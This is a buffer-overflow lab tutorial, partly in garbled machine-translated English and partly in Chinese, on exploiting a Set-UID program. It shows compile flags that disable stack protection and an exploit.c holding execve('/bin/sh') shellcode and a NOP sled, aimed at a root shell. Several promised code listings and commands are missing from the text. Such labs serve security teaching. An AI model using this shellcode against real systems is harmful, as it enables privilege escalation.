Buffer Overflow Vulnerability Experiment
First, the experiment described
Buffer overflow refers to circumstances beyond the pre-allocated program attempts to write data to a fixed-length buffer. This vulnerability can be used by malicious users to change the flow of the control program, even any fragment of code execution. The emergence of this vulnerability is due to the temporary closure of the data buffer and the return address, the overflow will cause the return address is rewritten
Second, the experimental procedure
----------
1, the initial setup
Ubuntu and other Linux systems, the use of address space randomization to address the initial random heap (heap) and stack (stack), which makes guessing the exact address of the memory becomes very difficult, but speculation is the memory address buffer overflow attacks The essential. Therefore, in this experiment, we use the following command to turn off this feature:
To further guard against buffer overflow attacks and other attacks using the shell program, many shell program automatically give up their privileges when invoked. So, even if you can cheat a Set-UID program calls a shell, can not remain in this shell with root privileges, this protective measures implemented in the / bin / bash in.
linux system, / bin / sh is actually a symbolic link to / bin / bash or / bin / dash of. In order to recreate the conditions before the protective measures are implemented, we use another shell program (zsh) instead of / bin / bash. The following instructions describe how to set zsh program:
In general, a buffer overflow can cause a crash in the program, the overflow of data covering the return address. If overwrite the return address data is another address, then the program will jump to the address if the address is stored for a well-designed code used to implement other functions, this code is shellcode
2, the vulnerable program
Save the following code as "stack.c" file, save it to the / tmp directory. code show as below:
Can know by the code, the program will read the file named "badfile", and the file is loaded into the "buffer".
Compile the program and set the SET-UID. Command is as follows:
$ sudo su
$ gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
$ chmod u+s stack
$ exitGCC编译器有一种栈保护机制来阻止缓冲区溢出,所以我们在编译代码时需要用 –fno-stack-protector 关闭这种机制。 而 -z execstack 用于允许执行栈。-g 参数是为了使编译后得到的可执行文档能用 gdb 调试
3、攻击程序
我们的目的是攻击刚才的漏洞程序,并通过攻击获得 root 权限。
在 /tmp 目录下新建一个 exploit.c 文件,输入如下内容:
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[] =
"\x31\xc0" //xorl %eax,%eax
"\x50" //pushl %eax
"\x68""//sh" //pushl $0x68732f2f
"\x68""/bin" //pushl $0x6e69622f
"\x89\xe3" //movl %esp,%ebx
"\x50" //pushl %eax
"\x53" //pushl %ebx
"\x89\xe1" //movl %esp,%ecx
"\x99" //cdq
"\xb0\x0b" //movb $0x0b,%al
"\xcd\x80" //int $0x80
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??"); //在buffer特定偏移处起始的四个字节覆盖sellcode地址
strcpy(buffer + 100, shellcode); //将shellcode拷贝至buffer,偏移量设为了 100
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}注意上面的代码,\x??\x??\x??\x?? 处需要添上 shellcode 保存在内存中的地址,因为发生溢出后这个位置刚好可以覆盖返回地址。而 strcpy(buffer+100,shellcode); 这一句又告诉我们,shellcode 保存在 buffer + 100 的位置。下面我们将详细介绍如何获得我们需要添加的地址。
现在我们要得到 shellcode 在内存中的地址,输入命令:
$ gdb stack
$ disass main